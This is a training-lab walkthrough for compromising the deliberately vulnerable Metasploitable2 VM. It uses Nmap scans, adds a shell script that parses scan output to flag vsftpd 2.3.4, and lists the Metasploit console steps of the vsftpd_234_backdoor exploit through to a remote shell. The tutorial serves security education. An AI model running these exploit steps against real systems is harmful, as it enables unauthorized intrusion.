Exploiting Metasploitable2: Nmap + Metasploit Guide


This hands-on cybersecurity lab demonstration shows how attackers combine reconnaissance and exploitation techniques using Nmap and Metasploit. The setup involves two machines: a Kali Linux attacker system equipped with penetration testing tools and a vulnerable target host (such as Metasploitable). The goal is to simulate a real-world penetration test, starting from target discovery and ending with successful exploitation and session management.

The lab begins by verifying basic connectivity between both systems using ifconfig and ping commands. Once communication is confirmed, the attacker leverages Nmap to perform host discovery, identify open ports, and enumerate services running on the target. With detailed service information, potential vulnerabilities can be mapped to known exploits.

Next, the attacker launches Metasploit Framework (msfconsole) to load an exploit module corresponding to the vulnerable service discovered during scanning. Critical parameters such as the target IP address and service port are configured before executing the exploit. If successful, Metasploit establishes a session, often a Meterpreter shell, which allows the attacker to interact with and control the compromised system.

This exercise illustrates the importance of proactive defense, patching, and monitoring, while providing learners with practical exposure to offensive security methodologies in a safe, controlled environment.


Attacker PC: Kali Linux
Tools used: Nmap, Metasploit

Check connectivity: ping from both sides.

#ping 192.168.142.128 (ping Kali from Metasploitable)
#ifconfig (on Kali)
#ping 192.168.142.130 (ping Metasploitable from Kali)
From the above exercise we understand that a successful connection has been established. Now open a terminal on Kali and check whether the installed Nmap is the latest, upgraded version: #nmap --version.
Yes, Nmap 7.94 is an upgraded version. It was released with several significant improvements and new features, including a migration of Zenmap and Ndiff to Python 3, enhanced OS fingerprint matching, and various library upgrades. The latest version is actually Nmap 7.96, which further builds upon these enhancements with even more performance improvements and new scripts.

NMAP SCAN ENTIRE LOCAL NETWORK
Command used
#nmap -sV -p 21 192.168.142.130 (Metasploitable)
This scans port 21 (commonly used for FTP, the File Transfer Protocol) on the target system and detects the version of the service running on that port.

The above command is used to scan the Metasploitable target machine on IP 192.168.142.130, specifically focusing on port 21, which is the default port for FTP (File Transfer Protocol).
  • The -sV option enables service version detection, which goes beyond simply identifying whether the port is open. It attempts to determine the exact version of the service running, such as vsftpd 2.3.4.
  • The -p 21 option instructs Nmap to scan only port 21/tcp instead of scanning a full port range. This makes the scan faster and more targeted. The IP 192.168.142.130 points to the vulnerable Metasploitable machine within the lab environment.

Detect open ports

# nmap -A -p 21 192.168.142.130

By using the above command we can perform an aggressive scan on the target machine (192.168.142.130, Metasploitable), focusing only on port 21 (FTP).

-A → Enables aggressive scanning mode, which combines multiple Nmap features:

    • Service version detection (like -sV)
    • Operating system detection
    • Default Nmap NSE scripts for vulnerability and service probing
    • Traceroute information

-p 21 → Restricts the scan to port 21/tcp, which is the default FTP service port.

When executed, this scan not only checks whether FTP is open but also attempts to identify:

  • The exact FTP software and version (e.g., vsftpd 2.3.4).
  • Potential security warnings or misconfigurations.
  • The operating system running on the target host.
  • Additional service details using built-in Nmap scripts.

Perform an aggressive scan

#nmap -A -oA report 192.168.142.130
This command not only gathers comprehensive reconnaissance data (open ports, running services, service versions, OS details, and potential vulnerabilities) but also saves the scan in multiple formats. This is essential for penetration testers who need to:
  • Document findings in reports.
  • Parse results for automation or integration into other tools.
  • Maintain an audit trail of scans conducted.

This will save the results as:
  • report.nmap (normal)
  • report.xml (XML)
  • report.gnmap (grepable)
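The "parse results for automation" point above is easiest to see on the grepable file. The following POSIX shell script is an added example, not part of the original lab: it writes a constructed report.gnmap fragment (in nmap's real grepable layout, but not a capture from the author's machines), lists every open port with its detected service and version, and flags the vsftpd 2.3.4 build that the lab later exploits, which is the kind of check a defender would run over their own scan output. The function names are this example's own.

```shell
#!/bin/sh
# Added example (not the lab's own code): parse the grepable output that
# "nmap -oA report <target>" writes as report.gnmap.

write_sample_gnmap() {
    # Constructed .gnmap fragment mimicking "nmap -A -oA report 192.168.142.130".
    # Fields are tab-separated; each port entry is port/state/proto/owner/service/rpc/version/.
    {
        printf '# Nmap 7.94 scan initiated as: nmap -A -oA report 192.168.142.130\n'
        printf 'Host: 192.168.142.130 ()\tStatus: Up\n'
        printf 'Host: 192.168.142.130 ()\tPorts: %s\tIgnored State: closed (977)\n' \
            '21/open/tcp//ftp//vsftpd 2.3.4/, 22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)/, 25/filtered/tcp//smtp///'
        printf '# Nmap done -- 1 IP address (1 host up) scanned\n'
    } > "$1"
}

open_services() {
    # Print "host port/proto service version" for every port in state "open".
    # Filtered or closed ports are skipped, so the output is the exposed surface.
    awk -F'\t' '
        /^Host: / && /\tPorts: / {
            split($1, h, " "); host = h[2]
            ports = ""
            for (i = 2; i <= NF; i++)
                if (index($i, "Ports: ") == 1) ports = substr($i, 8)
            n = split(ports, p, ", ")
            for (j = 1; j <= n; j++) {
                split(p[j], f, "/")
                if (f[2] == "open")
                    printf "%s %s/%s %s %s\n", host, f[1], f[3], f[5], f[7]
            }
        }' "$1"
}

flag_vsftpd_backdoor() {
    # Succeed (exit 0) and print the matching line when the backdoored
    # vsftpd 2.3.4 build is among the open services; exit 1 otherwise.
    open_services "$1" | grep -F 'vsftpd 2.3.4'
}

main() {
    tmp=$(mktemp)
    write_sample_gnmap "$tmp"
    echo "Open services:"
    open_services "$tmp"
    if flag_vsftpd_backdoor "$tmp" >/dev/null; then
        echo "WARNING: vsftpd 2.3.4 is exposed; patch or disable the FTP service."
    fi
    rm -f "$tmp"
}

main
```

Run it against a real report.gnmap by replacing the temporary file path in main; the same awk parser works unchanged because it only relies on the tab-separated Host/Ports layout.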

NEXT STEP EXPLOITATION

Start msfconsole

msf6 > search ftp

It will show all the exploit results (almost 500).

Next:

msf6 > search vsftpd
We are interested in the backdoor module (vsftpd_234_backdoor).

So:

msf6 > use 1 (the index of vsftpd_234_backdoor in the search output; it can also be selected by name)
msf6 > show options
msf6 > set RHOSTS 192.168.142.130
msf6 > set RPORT 21
msf6 > exploit
Result:

1- Established connection between Kali Linux and Metasploitable
2- Ping for verification
3- Checked nmap --version for verification
4- Up to date
5- Performed an aggressive scan
6- With the help of msfconsole,
7- Exploited Metasploitable and accessed the shell

Conclusion: This lab illustrates the complete life cycle of a penetration test in a controlled environment using two widely adopted tools: Nmap and Metasploit. The exercise begins with establishing basic connectivity between the attacker machine (Kali Linux) and the vulnerable target (Metasploitable), ensuring that the network setup is correct through IP verification and ping testing.

Once communication is confirmed, the attacker employs Nmap for reconnaissance. Nmap is first checked for availability, then used to conduct an aggressive scan, revealing open ports, running services, and system fingerprints. In this case, the scan identifies vulnerable services such as FTP (vsftpd 2.3.4), which is known to contain a backdoor vulnerability. This reconnaissance stage is crucial as it transforms raw network data into actionable intelligence for exploitation.

The next phase involves launching Metasploit Framework (msfconsole), a powerful exploitation toolkit. By selecting the appropriate exploit module (vsftpd_234_backdoor) and configuring target details, the attacker successfully compromises the system. Metasploit establishes a session, enabling the attacker to gain remote shell access. From here, system-level commands such as whoami or uname -a can be executed, confirming full control of the victim system.

Overall, the lab demonstrates the workflow of discovery → vulnerability identification → exploitation → post-exploitation. It highlights the importance of regular patching, vulnerability management, and monitoring to prevent attackers from leveraging outdated services and known exploits to gain unauthorized access.

FAQs

1. What is Metasploitable2 and why is it used in penetration testing?
Metasploitable 2 is an intentionally vulnerable virtual machine designed for cybersecurity training. It allows ethical hackers and students to practice vulnerability scanning, exploitation, and privilege escalation in a safe lab environment. Nmap and Metasploit Framework are commonly used tools for discovering and exploiting its vulnerabilities. 

2. Why is Nmap used before exploiting Metasploitable2?
Nmap is used to perform reconnaissance and identify open ports, running services, and software versions on the target system. This information helps penetration testers determine which vulnerabilities and exploits may work against the system. 

3. What vulnerabilities can be discovered on Metasploitable2 using Nmap?
A typical Nmap scan reveals multiple vulnerable services such as FTP (vsftpd), Telnet, SMTP, Apache web server, MySQL, and Samba. Many of these services are outdated or misconfigured, making them easy targets for exploitation during security testing. 

4. What are the most common exploits in Metasploitable2?
Some of the most commonly exploited vulnerabilities include the vsftpd 2.3.4 backdoor, Samba remote code execution, UnrealIRCd backdoor, and vulnerable web applications hosted on the Apache server. These vulnerabilities allow attackers to gain remote access or execute commands on the system. 

5. Which Nmap command is commonly used to scan Metasploitable2?
A widely used command is:
nmap -sV -A <target-ip>
This command performs service version detection, operating system detection, and script scanning to gather detailed information about the target system.

6. Is it safe to practice exploitation on Metasploitable2?
Yes, Metasploitable2 is specifically created for cybersecurity training and ethical hacking practice. However, it should always be used in an isolated lab environment (such as VirtualBox or VMware) and never exposed to the public internet.
